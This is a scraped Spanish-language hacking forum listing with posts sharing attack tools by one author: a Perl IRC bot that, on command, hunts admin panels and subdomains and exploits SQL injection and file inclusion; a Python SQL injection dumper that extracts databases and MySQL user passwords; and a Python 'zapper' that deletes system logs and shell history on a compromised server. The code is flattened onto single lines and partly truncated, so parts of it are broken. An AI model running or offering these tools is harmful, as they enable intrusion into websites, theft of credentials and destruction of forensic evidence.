Programación / Scripting / [Perl] Terr0r B0t By Doddy H
en: 7 Octubre 2011, 15:55 pm
Hola a todos. Hoy les traigo un programa que hice anoche: es un bot IRC que tiene las siguientes opciones:
* Codificación y decodificación de base64, hex, ascii
* Buscar panel de administración de algún sitio
* Scan SQLI (busca número de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal:
!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='
Forma de uso:
C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl
[+] tERR0R b0T (c) dODDy HacKMaN 2010
[+] Starting the bot
[+] Online
#!usr/bin/perl #Terr0r B0t (C) Doddy Hackman 2010 #Commands to use # #!base64 encode/decode string #!hex encode/decode string #!ascii encode/decode string #!panel http://127.0.0.1 #!sqli http://127.0.0.1/sql.php?id= #!lfi http://127.0.0.1/lfi.php?file=' # # use IO::Socket; use LWP::UserAgent; use HTTP::Request::Common; @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); 
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.ph
p','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admi
n4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new(); $nave->timeout(13); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n"; my $servidor = "127.0.0.1"; #Servidor IRC my $canal = "#locos"; #Canal IRC del servidor especificado my $nick = "Lepuke-Slave"; # Apodo del bot my $port = "6667"; # Puerto del servidor IRC print "[+] Starting the bot\n"; my $soquete = new IO::Socket::INET( PeerAddr =>$servidor, PeerPort => $port, Proto => 'tcp' ); if (!$soquete) { print "\n[-] No se puedo conectar en $servidor $port\n"; } print $soquete "NICK $nick\r\n"; print $soquete "USER $nick 1 1 1 1\r\n"; print $soquete "JOIN $canal\r\n"; while ( my $log = <$soquete> ) { if ($log =~ /^PING(.*)$/i){ print $soquete "PONG $1\r\n"; } if($log =~ m/:!panel (.*)$/g) { scan($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!sqli (.*)$/g) { print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n"; scan2($1); } if($log =~ m/:!fuzzdns (.*)$/g) { scan1($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!lfi (.*)$/g) { lfi($1); print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } if($log =~ m/:!base64 (.*) (.*)$/g) { use MIME::Base64; my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64 ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64 ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ??\r\n"; } } if($log =~ m/:!ascii (.*) (.*)$/) 
{ my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".ascii ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ???\r\n"; } } if($log =~ m/:!hex (.*) (.*)$/) { my ($opcion,$aa) = ($1,$2); if ($opcion eq "encode") { print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Encode : ".encode ($aa)."\r\n"; } elsif ($opcion eq "decode") { print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n"; print $soquete "PRIVMSG $canal : [+] Text : ".decode ($aa)."\r\n"; } else { print $soquete "PRIVMSG $canal : ????\r\n"; } } } sub lfi { print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n"; $code = toma($_[0]); if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) { print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n"; print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n"; print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n"; for my $file(@buscar3) { $code1 = toma($_[0].$file); unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) { $ok = 1; print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n"; } } unless($ok == 1) { print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n"; } } else { print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n"; } } sub scan1 { print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n"; for my $path(@dns) { $code = tomax("http://".$path.".".$_[0]); if ($code->is_success) { print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n"; } } } sub scan { print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n"; for my $path(@panels) { $code 
= tomax($_[0]."/".$path); if ($code->is_success) { $ct = 1; print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n"; } } if ($ct ne 1) { print $soquete "PRIVMSG $canal [-] Not found any path\r\n"; } } sub scan2 { my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($ARGV[1]); $inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2; $code = toma($inyection); if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) { $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { my $path = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..52) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; print $soquete "PRIVMSG $canal : [Page] : $page\r\n"; print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n"; print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n"; if ($test=~/RATSXPDOWN(\d+)/) { if ($path) { print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n"; } $total=~s/@number[0]/hackman /; print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n"; &details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]); last; } } } } } sub details { my $page = $_[0]; ($pass1,$pass2) = 
&bypass($ARGV[1]); if ($page=~/(.*)hackman(.*)/ig) { my $start = $1; my $end = $2; $test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2); $test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2); $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); if ($test2=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n"; } if ($test1=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n"; } if ($test3=~/ERTOR854/ig) { print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n"; } $code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n"; print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n"; print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n"; } else { print $soquete "PRIVMSG $canal : [-] Not found any data\r\n"; } print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n"; } } } sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub ascii { } sub ascii_de { } sub encode { my $string = $_[0]; $hex = '0x'; sub decode { $_[0] =~ s/^0x//; } sub toma { return $nave->request (GET $_[0])->content; } sub tomax { return $nave->request (GET $_[0]); } #The End
Programación / Scripting / [Python] SQL Scanner 0.3
en: 7 Octubre 2011, 01:40 am
Bueno, este es un simple scanner en Python que hice para SQLI, con las siguientes opciones:
- Verifica vulnerabilidad
- Busca columnas
- Busca el número milagroso y saca info sobre la DB
- Saca tablas y columnas de la DB actual u otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logs
#!usr/bin/python #SQL Scanner 0.3 (C) Doddy Hackman 2010 import os,sys,urllib2,re,binascii from urlparse import urlparse def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text+"\n") file.close() def gethost(test): return urlparse(test).netloc def header() : print "\n--== SQL Scanner ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = 
re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","[DB] : "+db) savefile("logs/"+gethost(web)+".txt","[DB] : "+table) print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for 
counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" savefile("logs/"+gethost(web)+".txt","[DB] : "+db) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] 
information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching tables\n\n" savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] 
print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Show log\n" print "10 - Change target\n" print "11 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) raw_input() menu(page,bypass) elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) raw_input() menu(page,bypass) elif op == 3: showdbs(page,bypass) raw_input() menu(page,bypass) elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) raw_input() menu(page,bypass) elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) raw_input() menu(page,bypass) elif op == 6: mysqluser(page,bypass) raw_input() menu(page,bypass) elif op == 7: more(page,bypass) raw_input() menu(page,bypass) elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) raw_input() menu(page,bypass) elif op == 9: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 10: sta() except: menu(page,bypass) if op == 11: copyright() def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching 
more data\n" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla) menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = 
toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") scan(web,bypasx) sta() #The End
Programación / Scripting / [Python] Zapper By Doddy H
en: 7 Octubre 2011, 01:39 am
Hola a todos. Acabo de hacer un simple zapper en python , tan solo lo cargan en el sistema web atacado y comienza a borrar huellas. Eso si , no me habia dado cuenta de que facil usar python xDD #!usr/bin/python #Zapper (C) Doddy Hackman import os paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"] comandos = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST'] print "\n[+] Starting the zapper" for path in paths : try : os.delete(path) except : pass for cmd in comandos : try: os.system(cmd) except: pass print "[+] All logs are erased\n" #The End ?
Programación / Scripting / [Python] RFI Tester
en: 7 Octubre 2011, 01:39 am
